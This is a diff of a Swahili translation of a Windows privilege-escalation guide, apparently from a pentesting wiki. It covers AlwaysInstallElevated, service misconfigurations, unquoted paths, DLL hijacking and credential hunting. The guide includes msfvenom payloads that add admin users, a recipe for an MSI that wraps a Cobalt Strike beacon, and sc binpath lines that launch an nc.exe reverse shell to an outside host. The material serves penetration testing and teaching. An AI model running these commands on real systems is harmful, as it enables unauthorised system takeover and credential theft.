escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya yanajumuisha mazingira ambapo **LDAP signing is not enforced,** watumiaji wana haki za kujitegemea zinazowawezesha kusanidi **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda kompyuta ndani ya domain. Ni muhimu kutambua kwamba mahitaji haya yanatimizwa kwa kutumia **default settings**. -Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) +Pata **exploit** katika [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp) -Kwa taarifa zaidi kuhusu mtiririko wa attack angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) +Kwa taarifa zaidi kuhusu mtiririko wa shambulio angalia [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/) ## AlwaysInstallElevated -**If** hizi registry mbili ziko **enabled** (thamani ni **0x1**), basi watumiaji wa aina yoyote ya ruhusa wanaweza **install** (execute) `*.msi` files kama NT AUTHORITY\\**SYSTEM**. +**Ikiwa** vigezo hivi viwili vya rejista vimewezeshwa (thamani ni **0x1**), basi watumiaji wa ngazi yoyote ya ruhusa wanaweza **kufunga** (kutekeleza) faili za `*.msi` kama NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated @@ -223,19 +231,20 @@ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallEle msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted ``` -Iwapo una kikao cha meterpreter unaweza kuendesha kiotomatiki mbinu hii kwa kutumia module **`exploit/windows/local/always_install_elevated`** +Ikiwa una meterpreter session unaweza kuotomatisha mbinu hii kwa kutumia module **`exploit/windows/local/always_install_elevated`** ### PowerUP -Tumia amri ya `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binari ya Windows MSI ili kupandisha ruhusa. Script hii inaandika msanidi MSI uliotangulia ambayo itauliza kuongeza mtumiaji/kikundi (hivyo utahitaji GIU access): +Tumia amri `Write-UserAddMSI` kutoka power-up kuunda ndani ya saraka ya sasa binary ya Windows MSI ili kuinua vibali. Script hii inaandika msanidi MSI uliotayarishwa awali ambao utauliza kuongeza mtumiaji/kikundi (hivyo utahitaji GIU access): ``` Write-UserAddMSI ``` -Tekeleza tu binary iliyoundwa ili kuongeza ruhusa. +Tekeleza tu binary iliyoundwa ili escalate privileges. ### MSI Wrapper -Soma mafunzo haya kujifunza jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza kufunika faili "**.bat**" ikiwa unataka **tu** **kutekeleza** **mistari ya amri** +Soma mafunzo haya ili ujifunze jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza ku-wrap faili ya "**.bat**" ikiwa unataka tu ku-execute **command lines** + {{#ref}} msi-wrapper.md @@ -250,44 +259,44 @@ create-msi-with-wix.md ### Create MSI with Visual Studio -- **Tengeneza** kwa Cobalt Strike au Metasploit **new Windows EXE TCP payload** katika `C:\privesc\beacon.exe` -- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utaftaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. -- Mpatie mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. -- Endelea kubonyeza **Next** hadi ufike hatua ya 3 kati ya 4 (chagua faili za kujumuisha). Bonyeza **Add** na chagua Beacon payload uliyounda. Kisha bonyeza **Finish**. -- Chagua mradi wa **AlwaysPrivesc** katika **Solution Explorer** na kwenye **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. -- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya app iliyosakinishwa ionekane halali zaidi. -- Bonyeza kulia kwenye mradi na chagua **View > Custom Actions**. -- Bonyeza kulia **Install** na chagua **Add Custom Action**. -- Bonyeza mara mbili kwenye **Application Folder**, chagua faili yako ya **beacon.exe** na bonyeza **OK**. Hii itahakikisha Beacon payload inatekelezwa mara tu installer inapoendeshwa. +- **Tengeneza** na Cobalt Strike au Metasploit payload mpya ya **Windows EXE TCP** katika `C:\privesc\beacon.exe` +- Fungua **Visual Studio**, chagua **Create a new project** na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa **Setup Wizard** na bonyeza **Next**. +- Mpa mradi jina, kama **AlwaysPrivesc**, tumia **`C:\privesc`** kwa eneo, chagua **place solution and project in the same directory**, na bonyeza **Create**. +- Endelea kubofya **Next** hadi ufike hatua ya 3 ya 4 (choose files to include). Bonyeza **Add** na chagua Beacon payload uliyoiunda. Kisha bonyeza **Finish**. +- Chagua mradi **AlwaysPrivesc** katika **Solution Explorer** na kwenye **Properties**, badilisha **TargetPlatform** kutoka **x86** hadi **x64**. +- Kuna mali nyingine unaweza kubadilisha, kama **Author** na **Manufacturer** ambazo zinaweza kufanya programu iliyosakinishwa ionekane halali zaidi. +- Bofya kulia mradi na chagua **View > Custom Actions**. +- Bofya kulia **Install** na chagua **Add Custom Action**. +- Bonyeza mara mbili **Application Folder**, chagua faili yako **beacon.exe** na bonyeza **OK**. Hii itahakikisha kwamba beacon payload itaendeshwa mara installer itakapotekelezwa. - Chini ya **Custom Action Properties**, badilisha **Run64Bit** kuwa **True**. -- Mwishowe, **build it**. +- Hatimaye, **build it**. - Ikiwa onyo `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` linaonekana, hakikisha umeweka platform kuwa x64. ### MSI Installation -Ili kutekeleza **installation** ya faili hatari `.msi` kwa **background:** +Ili kuendesha **installation** ya faili hatarishi `.msi` kwa background: ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi ``` -Ili exploit udhaifu huu, unaweza kutumia: _exploit/windows/local/always_install_elevated_ +Ili exploit udhaifu huu unaweza kutumia: _exploit/windows/local/always_install_elevated_ ## Antivirus na Vichunguzi ### Mipangilio ya Ukaguzi -Mipangilio hii inaamua nini kinachokuwa **logged**, hivyo unapaswa kuzingatia. +Mipangilio hii inaamua kile kinachorekodiwa (**kinachorekodiwa**), hivyo unapaswa kuwa makini ``` reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit ``` ### WEF -Windows Event Forwarding, inavutia kujua logs zinatumwa wapi +Windows Event Forwarding — ni muhimu kujua wapi logs zinatumwa. ```bash reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager ``` ### LAPS -**LAPS** imeundwa kwa ajili ya **management of local Administrator passwords**, kuhakikisha kuwa kila nenosiri ni **unique, randomised, and regularly updated** kwenye kompyuta zinazounganishwa kwenye domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kupatikana tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, kuwaruhusu kuona local admin passwords ikiwa wameidhinishwa. +**LAPS** imeundwa kwa ajili ya usimamizi wa nywila za local Administrator, kuhakikisha kuwa kila nywila ni ya kipekee, ya kiholela, na inasasishwa mara kwa mara kwenye kompyuta zilizounganishwa kwenye domain. Nywila hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji waliopewa ruhusa za kutosha kupitia ACLs, wakiruhusiwa kuona local admin passwords ikiwa wameidhinishwa. {{#ref}} @@ -296,36 +305,36 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs ### WDigest -Ikiwa imewezeshwa, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\ +Ikiwa imewezeshwa, **plain-text passwords zinahifadhiwa katika LSASS** (Local Security Authority Subsystem Service).\ [**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest). ```bash reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential ``` ### LSA Protection -Kuanzia na **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyoaminika **kusoma kumbukumbu yake** au kuingiza code, na hivyo kuimarisha usalama wa mfumo.\ +Kuanzia **Windows 8.1**, Microsoft ilianzisha ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili **kuzuia** jaribio la michakato isiyo ya kuaminika **kusoma kumbukumbu yake** au kuingiza code, ikiboresha usalama wa mfumo.\ [**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection). ```bash reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL ``` ### Credentials Guard -**Credential Guard** ilianzishwa katika **Windows 10**. Madhumuni yake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) +**Credential Guard** ilianzishwa katika **Windows 10**. Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama pass-the-hash attacks.| [**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard) ```bash reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags ``` ### Cached Credentials -**Domain credentials** zinathibitishwa na **Local Security Authority** (LSA) na hutumika na vipengele vya mfumo wa uendeshaji. Wakati data za kuingia za mtumiaji zinapothibitishwa na registered security package, **domain credentials** kwa mtumiaji kwa kawaida huanzishwa.\ +**Domain credentials** zinathibitishwa na **Local Security Authority** (LSA) na zinatumika na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na kifurushi cha usalama kilichosajiliwa, domain credentials kwa mtumiaji kawaida huanzishwa.\ [**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials). ```bash reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT ``` -## Watumiaji na Makundi +## Watumiaji & Vikundi -### Orodhesha Watumiaji na Makundi +### Orodhesha Watumiaji & Vikundi -Unapaswa kukagua kama katika makundi unayomo kuna ruhusa za kuvutia +Unapaswa kuangalia kama kuna vikundi ambavyo uko ndani yake vinavyo ruhusa zenye kuvutia ```bash # CMD net users %username% #Me @@ -340,31 +349,31 @@ Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name Get-LocalGroupMember Administrators | ft Name, PrincipalSource ``` -### Vikundi vya walio na ruhusa za juu +### Privileged groups -Ikiwa **uko katika kundi fulani la walio na ruhusa za juu unaweza kupandisha ruhusa**. Jifunze kuhusu vikundi vya walio na ruhusa za juu na jinsi ya kuvifanyia matumizi mabaya ili kupandisha ruhusa hapa: +Ikiwa wewe **belongs to some privileged group you may be able to escalate privileges**. Jifunze kuhusu privileged groups na jinsi ya kuvitumia ili escalate privileges hapa: {{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}} -### Uendeshaji wa token +### Token manipulation **Jifunze zaidi** kuhusu ni nini **token** kwenye ukurasa huu: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\ -Tazama ukurasa uliofuata ili **ujifunze kuhusu tokens zinazovutia** na jinsi ya kuzitumia vibaya: +Angalia ukurasa ufuatao ili **learn about interesting tokens** na jinsi ya kuvitumia: {{#ref}} privilege-escalation-abusing-tokens.md {{#endref}} -### Watumiaji walioingia / Vikao +### Logged users / Sessions ```bash qwinsta klist sessions ``` -### Folda za nyumbani +### Mafolda ya nyumbani ```bash dir C:\Users Get-ChildItem C:\Users @@ -377,12 +386,12 @@ net accounts ```bash powershell -command "Get-Clipboard" ``` -## Michakato Inayoendelea +## Mchakato Zinazokimbia -### Ruhusa za Faili na Folda +### Ruhusa za Faili na Saraka -Kwanza kabisa, kwa kuorodhesha michakato **angalia passwords ndani ya mstari wa amri wa mchakato**.\ -Angalia ikiwa unaweza **kuandika juu ya binary inayokimbia** au ikiwa una ruhusa za kuandika kwa folda ya binary ili kufaidika na [**DLL Hijacking attacks**](dll-hijacking/index.html): +Kwanza kabisa, ukiorodhesha michakato **angalia passwords ndani ya command line ya mchakato**.\ +Angalia ikiwa unaweza **overwrite some binary running** au ikiwa una ruhusa ya kuandika katika saraka ya binary ili ku-exploit uwezekano wa [**DLL Hijacking attacks**](dll-hijacking/index.html): ```bash Tasklist /SVC #List processes running and services tasklist /v /fi "username eq system" #Filter "system" processes @@ -393,7 +402,7 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv #Without usernames Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id ``` -Daima angalia uwezekano wa [**electron/cef/chromium debuggers** zinazokimbia; unaweza kuvitumia vibaya kuongezea ruhusa](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). +Daima angalia kama [**electron/cef/chromium debuggers** zinaendeshwa; unaweza kuzitumia vibaya kupandisha ruhusa](../../linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md). **Kukagua ruhusa za binaries za michakato** ```bash @@ -412,49 +421,49 @@ icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone todos %username%" && echo. ) ``` -### Uchimbaji wa password za kumbukumbu +### Memory Password mining -Unaweza kuunda dump ya kumbukumbu ya mchakato unaoendelea kwa kutumia **procdump** kutoka kwa sysinternals. Huduma kama FTP zina **credentials katika maandishi wazi kwenye kumbukumbu**, jaribu kufanya dump ya kumbukumbu na kusoma credentials. +Unaweza kuunda memory dump ya mchakato unaoendelea kwa kutumia **procdump** kutoka sysinternals. Huduma kama FTP huwa na **credentials in clear text in memory**, jaribu ku-dump memory na kusoma credentials. ```bash procdump.exe -accepteula -ma ``` ### Programu za GUI zisizo salama -**Programu zinazotendeshwa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** +**Programu zinazoendesha kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.** -Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza kwenye "Click to open Command Prompt" +Mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt" -## Huduma +## Services -Pata orodha ya huduma: +Pata orodha ya services: ```bash net start wmic service list brief sc query Get-Service ``` -### Permissions +### Ruhusa -Unaweza kutumia **sc** kupata taarifa za huduma +Unaweza kutumia **sc** kupata taarifa za service ```bash sc qc ``` -Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kukagua ngazi ya ruhusa inayohitajika kwa kila huduma. +Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kuangalia ngazi ya ruhusa inayohitajika kwa kila huduma. ```bash accesschk.exe -ucqv #Check rights for different groups ``` -Inashauriwa kukagua ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote: +Inapendekezwa kuangalia kama "Authenticated Users" wanaweza kubadilisha huduma yoyote: ```bash accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version ``` -[Unaweza kupakua accesschk.exe kwa XP hapa](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) +[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) ### Wezesha huduma -Ikiwa unapata kosa hili (kwa mfano na SSDPSRV): +Ikiwa unapata hitilafu hii (kwa mfano na SSDPSRV): _System error 1058 has occurred._\ _The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._ @@ -464,15 +473,15 @@ Unaweza kuiwezesha kwa kutumia sc config SSDPSRV start= demand sc config SSDPSRV obj= ".\LocalSystem" password= "" ``` -**Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)** +**Zingatia kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (for XP SP1)** -**Njia mbadala nyingine** ya tatizo hili ni kuendesha: +**Njia nyingine mbadala** ya tatizo hili ni kuendesha: ``` sc.exe config usosvc start= auto ``` ### **Badilisha njia ya binary ya huduma** -Katika tukio ambapo kundi la "Authenticated users" lina **SERVICE_ALL_ACCESS** kwenye huduma, inawezekana kubadilisha binary inayotekelezwa ya huduma. Ili kubadilisha na kutekeleza **sc**: +Katika hali ambapo kundi la "Authenticated users" lina **SERVICE_ALL_ACCESS** kwenye huduma, kubadilisha binary inayotekelezwa ya huduma inawezekana. Ili kubadilisha na kuendesha **sc**: ```bash sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config binpath= "net localgroup administrators username /add" @@ -480,25 +489,25 @@ sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cm sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" ``` -### Anzisha upya huduma +### Anzisha tena huduma ```bash wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] ``` -Inawezekana kupata ruhusa za juu kupitia ruhusa mbalimbali: +Madaraka yanaweza kupandishwa kupitia ruhusa mbalimbali: -- **SERVICE_CHANGE_CONFIG**: Inaruhusu kurekebisha usanidi wa binary ya service. -- **WRITE_DAC**: Inaruhusu upya wa ruhusa, ikiruhusu kubadilisha usanidi wa service. -- **WRITE_OWNER**: Inaruhusu upataji umiliki na kurekebisha ruhusa. +- **SERVICE_CHANGE_CONFIG**: Inaruhusu kurekebisha upya binary ya service. +- **WRITE_DAC**: Inawezesha kurekebisha ruhusa, jambo linalowezesha kubadilisha usanidi wa service. +- **WRITE_OWNER**: Inaruhusu kupata umiliki na kurekebisha ruhusa. - **GENERIC_WRITE**: Inarithi uwezo wa kubadilisha usanidi wa service. - **GENERIC_ALL**: Pia inarithi uwezo wa kubadilisha usanidi wa service. -Kwa utambuzi na matumizi ya udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. +Kwa kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. -### Ruhusa dhaifu za binaries za service +### Services binaries weak permissions -**Angalia kama unaweza kubadilisha binary inayotekelezwa na service** au ikiwa una **uruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ -Unaweza kupata kila binary inayotekelezwa na service kwa kutumia **wmic** (not in system32) na kuangalia ruhusa zako kwa kutumia **icacls**: +**Angalia kama unaweza kubadilisha binary inayotekelezwa na service** au kama una **ruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ +Unaweza kupata kila binary inayotekelezwa na service kwa kutumia **wmic** (not in system32) na ukakague ruhusa zako kwa kutumia **icacls**: ```bash for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt @@ -510,10 +519,10 @@ sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt ``` -### Services registry modify permissions +### Ruhusa za kubadilisha service registry Unapaswa kuangalia kama unaweza kubadilisha service registry yoyote.\ -Unaweza **kuangalia** **uruhusa** zako juu ya service **registry** kwa kufanya: +Unaweza **kuangalia** **uruhusa** zako kwenye service **registry** kwa kufanya: ```bash reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services @@ -522,16 +531,15 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" ``` -Inapaswa kukaguliwa kama **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wanamiliki ruhusa za `FullControl`. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa. +Inapaswa kuangaliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wana ruhusa za `FullControl`. Ikiwa hivyo, binary inayotekelezwa na service inaweza kubadilishwa. -Ili kubadilisha njia ya binary inayotekelezwa: +Ili kubadilisha Path ya binary inayotekelezwa: ```bash reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f ``` -### Ruhusa za AppendData/AddSubdirectory kwenye rejista ya Services - -Kama una ruhusa hii kwenye rejista, inamaanisha kuwa **unaweza kuunda rejista ndogo kutoka hii**. Katika kesi ya Windows services, hili ni **enough to execute arbitrary code:** +### Idhini za AppendData/AddSubdirectory kwenye rejista ya Services +Ikiwa una idhini hii kwenye rejista, hii inamaanisha **unaweza kuunda rejista ndogo kutoka hii**. Katika kesi ya Windows services hili ni **la kutosha kutekeleza msimbo wowote:** {{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md @@ -539,15 +547,15 @@ appenddata-addsubdirectory-permission-over-service-registry.md ### Njia za Service zisizo na nukuu -Ikiwa path ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi. +Ikiwa njia kuelekea executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu inayomalizika kabla ya nafasi. -Kwa mfano, kwa path _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: +Kwa mfano, kwa njia _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: ```bash C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe ``` -Orodhesha njia zote za huduma zisizo na nukuu, ukiondoa zile za huduma za Windows zilizojengwa: +Orodhesha njia zote za huduma zisizo na nukuu, ukiziondoa zile zinazomilikiwa na huduma za msingi za Windows: ```bash wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"' wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services @@ -567,19 +575,19 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && ```bash gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -**Unaweza kugundua na ku-exploit** udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda kwa mikono binari ya huduma kwa metasploit: +**Unaweza kugundua na kutumia** udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kutengeneza kwa mkono service binary kwa metasploit: ```bash msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe ``` -### Hatua za Urejesho +### Hatua za kurejesha -Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa ikiwa service itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana kwenye [nyaraka rasmi](). +Windows inaruhusu watumiaji kubainisha hatua ambazo zitatumika ikiwa huduma itashindikana. Kipengele hiki kinaweza kusanidiwa kuashiria binary. Iwapo binary hii inaweza kubadilishwa, privilege escalation inawezekana. Maelezo zaidi yanaweza kupatikana katika [nyaraka rasmi](). ## Programu -### Programu Zilizowekwa +### Programu zilizowekwa -Angalia **permissions of the binaries** (labda unaweza overwrite moja na escalate privileges) na of the **folders** ([DLL Hijacking](dll-hijacking/index.html)). +Angalia **ruhusa za binaries** (labda unaweza kuandika juu ya moja na ku-escalate privileges) na za **folda** ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" @@ -590,9 +598,9 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### Ruhusa za Kuandika -Angalia kama unaweza kubadilisha faili fulani ya usanidi ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks). +Angalia kama unaweza kubadilisha baadhi ya config file ili kusoma faili maalum au kama unaweza kubadilisha binary itakayotekelezwa na akaunti ya Administrator (schedtasks). -Njia ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya: +Njia mojawapo ya kupata ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya: ```bash accesschk.exe /accepteula # Find all weak folder permissions per drive. @@ -615,10 +623,10 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} ``` -### Endeshwa wakati wa kuanzishwa +### Run at startup -**Angalia ikiwa unaweza kuandika upya registry au binary fulani ambazo zitaendeshwa na mtumiaji tofauti.**\ -**Soma** ukurasa **ufuatao** ili ujifunze zaidi kuhusu maeneo ya autoruns yenye kuvutia ya kupandisha vibali: +**Angalia ikiwa unaweza overwrite baadhi ya registry au binary ambayo itatekelezwa na mtumiaji mwingine.**\ +**Soma** ukurasa **ufuatao** ili kujifunza zaidi kuhusu **autoruns locations to escalate privileges**: {{#ref}} @@ -627,13 +635,13 @@ privilege-escalation-with-autorun-binaries.md ### Madereva -Tafuta madereva ya **pande za tatu zisizo za kawaida/zinazoweza kuwa na udhaifu** +Tafuta madereva ya **third party weird/vulnerable** ```bash driverquery driverquery.exe /fo table driverquery /SI ``` -Ikiwa driver huweka wazi arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizobuniwa vibaya), unaweza escalate kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa: +Iwapo driver inatoa arbitrary kernel read/write primitive (kawaida katika IOCTL handlers zilizotengenezwa vibaya), unaweza kupandisha hadhi kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Tazama mbinu ya hatua‑kwa‑hatua hapa: {{#ref}} arbitrary-kernel-rw-token-theft.md @@ -642,9 +650,9 @@ arbitrary-kernel-rw-token-theft.md ## PATH DLL Hijacking -Ikiwa una **write permissions inside a folder present on PATH**, unaweza kuwa na uwezo wa hijack a DLL loaded by a process na **escalate privileges**. +Ikiwa una **uruhusa za kuandika ndani ya folda iliyo kwenye PATH**, unaweza kuwa na uwezo wa hijack DLL inayopakiwa na process na **escalate privileges**. -Angalia ruhusa za folda zote ndani ya PATH: +Kagua ruhusa za folda zote ndani ya PATH: ```bash for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) ``` @@ -656,7 +664,7 @@ dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md ## Mtandao -### Shares +### Sehemu zilizoshirikiwa ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains @@ -666,19 +674,19 @@ net share #Check current shares ``` ### hosts file -Angalia kompyuta nyingine zinazojulikana zilizowekwa hardcoded kwenye hosts file +Angalia kompyuta nyingine zinazojulikana zilizohardcoded kwenye hosts file ``` type C:\Windows\System32\drivers\etc\hosts ``` -### Kiolesura za Mtandao & DNS +### Violesura vya Mtandao & DNS ``` ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` -### Bandari Zilizo wazi +### Bandari Wazi -Angalia **huduma zilizo na vizuizi** kutoka nje +Angalia huduma **zilizo na vikwazo** kutoka nje ```bash netstat -ano #Opened ports? ``` @@ -692,33 +700,33 @@ Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIn arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ``` -### Kanuni za Firewall +### Firewall Rules -[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha kanuni, unda kanuni, zima, zima...)** +[**Angalia ukurasa huu kwa amri zinazohusiana na Firewall**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha rules, unda rules, zima, zima...)** -Zaidi[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) +Zaidi[ amri za network enumeration hapa](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl) ```bash C:\Windows\System32\bash.exe C:\Windows\System32\wsl.exe ``` -Binari `bash.exe` pia inaweza kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` +Binary `bash.exe` inaweza pia kupatikana katika 